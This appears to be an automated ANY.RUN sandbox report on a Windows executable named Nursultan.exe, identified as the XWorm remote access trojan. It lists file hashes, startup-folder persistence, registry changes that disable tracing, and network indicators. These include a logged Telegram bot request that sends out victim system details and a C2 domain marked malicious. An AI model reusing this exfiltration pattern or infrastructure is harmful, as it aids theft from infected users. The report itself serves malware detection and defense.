File name:

Nursultan.exe

Full analysis: https://app.any.run/tasks/20455deb-7cf2-4047-8b2a-07c768771bb3
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: November 17, 2024, 10:41:35
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
telegram
xworm
crypto-regex
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

D326A49628C02672B8199E2D7F6EEFD6

SHA1:

3D7BFCB1055DF6D9A99B9A861735643D979DBEF1

SHA256:

78FAA3006A538EBB08D194B94FFAEC25E5A704A40E0AAFA533F3E5C538D453AD

SSDEEP:

6144:axIFld5IVHssNCbQeA3K+9RgYfxx2uCPY9UIUSKY3Q+k7te19oEqlv/FQkwOPhbn:a2FlTr8eSPLggCDINK+4bAE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • Nursultan.exe (PID: 4380)

    • XWORM has been detected (YARA)

      • Nursultan.exe (PID: 4380)

    • XWORM has been detected (SURICATA)

      • Nursultan.exe (PID: 4380)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • Nursultan.exe (PID: 5100)

    • Starts CMD.EXE for commands execution

      • Nursultan.exe (PID: 5100)

    • Executable content was dropped or overwritten

      • Nursultan.exe (PID: 5100)
      • Nursultan.exe (PID: 4380)

    • Reads the date of Windows installation

      • Nursultan.exe (PID: 5100)

    • Executing commands from a ".bat" file

      • Nursultan.exe (PID: 5100)

    • Checks for external IP

      • svchost.exe (PID: 2172)
      • Nursultan.exe (PID: 4380)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • Nursultan.exe (PID: 4380)

    • Found regular expressions for crypto-addresses (YARA)

      • Nursultan.exe (PID: 4380)

    • Connects to unusual port

      • Nursultan.exe (PID: 4380)

    • Contacting a server suspected of hosting an CnC

      • Nursultan.exe (PID: 4380)

    • The process creates files with name similar to system file names

      • Nursultan.exe (PID: 4380)

  • INFO

    • Checks supported languages

      • Nursultan.exe (PID: 5100)
      • Nursultan.exe (PID: 4380)

    • Reads the computer name

      • Nursultan.exe (PID: 5100)
      • Nursultan.exe (PID: 4380)

    • Reads the machine GUID from the registry

      • Nursultan.exe (PID: 5100)
      • Nursultan.exe (PID: 4380)

    • Process checks computer location settings

      • Nursultan.exe (PID: 5100)

    • Creates files or folders in the user directory

      • Nursultan.exe (PID: 5100)
      • Nursultan.exe (PID: 4380)

    • The process uses the downloaded file

      • Nursultan.exe (PID: 5100)

    • Reads Environment values

      • Nursultan.exe (PID: 4380)

    • Disables trace logs

      • Nursultan.exe (PID: 4380)

    • Checks proxy server information

      • Nursultan.exe (PID: 4380)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (63.1)
.exe | Win64 Executable (generic) (23.8)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)
.exe | Generic Win/DOS Executable (1.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:11:08 17:30:48+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 290304
InitializedDataSize: 211968
UninitializedDataSize: -
EntryPoint: 0x48d6e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 1.0.0.0
InternalName: Nursultan.exe
LegalCopyright:
OriginalFileName: Nursultan.exe
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start nursultan.exe #XWORM nursultan.exe cmd.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2172C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3648C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\..bat" "C:\Windows\System32\cmd.exeNursultan.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
4380"C:\Users\admin\AppData\Roaming\Nursultan.exe" C:\Users\admin\AppData\Roaming\Nursultan.exe
Nursultan.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\nursultan.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
5100"C:\Users\admin\Desktop\Nursultan.exe" C:\Users\admin\Desktop\Nursultan.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\nursultan.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
5 028
Read events
5 013
Write events
15
Delete events
0

Modification events

(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4380) Nursultan.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Nursultan_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
2
Suspicious files
1
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
4380Nursultan.exeC:\Users\admin\AppData\Roaming\svchost.exeexecutable
MD5:05559D83CE9B8984E66740F882A2DAC9
SHA256:FB2AA53B1C2C105AC321ABF3448AFB452EEDFF2F0407846FB3D85A8B6236E357
4380Nursultan.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkbinary
MD5:A2882339BC1923B14127B003498378C9
SHA256:22C41A7A088421512E1CE457B0612C42969329A6FE0E77A64F119BFED914AA4D
5100Nursultan.exeC:\Users\admin\AppData\Roaming\..battext
MD5:9905E5A33C6EDD8EB5F59780AFBF74DE
SHA256:C134B2F85415BA5CFCE3E3FE4745688335745A9BB22152AC8F5C77F190D8AEE3
5100Nursultan.exeC:\Users\admin\AppData\Roaming\Nursultan.exeexecutable
MD5:05559D83CE9B8984E66740F882A2DAC9
SHA256:FB2AA53B1C2C105AC321ABF3448AFB452EEDFF2F0407846FB3D85A8B6236E357
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
26
DNS requests
11
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6944
svchost.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3524
RUXIMICS.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6944
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4380
Nursultan.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
3524
RUXIMICS.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
404
149.154.167.99:443
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3C54740F7CC0F23B53E5%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
unknown
binary
55 b
whitelisted
POST
204
2.16.110.193:443
https://www.bing.com/threshold/xls.aspx
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5488
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6944
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3524
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.23.209.183:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
6944
svchost.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3524
RUXIMICS.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5488
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
6944
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
  • 40.127.240.158
whitelisted
www.bing.com
  • 2.23.209.183
  • 2.23.209.150
  • 2.23.209.137
  • 2.23.209.130
  • 2.23.209.135
  • 2.23.209.185
  • 2.23.209.140
  • 2.23.209.189
  • 2.23.209.143
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
ip-api.com
  • 208.95.112.1
shared
api.telegram.org
  • 149.154.167.220
shared
19.ip.gl.ply.gg
  • 147.185.221.19
malicious
self.events.data.microsoft.com
  • 20.189.173.2
whitelisted

Threats

PID
Process
Class
Message
2172
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2172
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
4380
Nursultan.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
4380
Nursultan.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
2172
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2172
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
4380
Nursultan.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
4380
Nursultan.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
Misc activity
ET HUNTING Telegram API Request (GET)
2172
svchost.exe
Misc activity
ET INFO Tunneling Service in DNS Lookup (* .ply .gg)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Nursultan.exe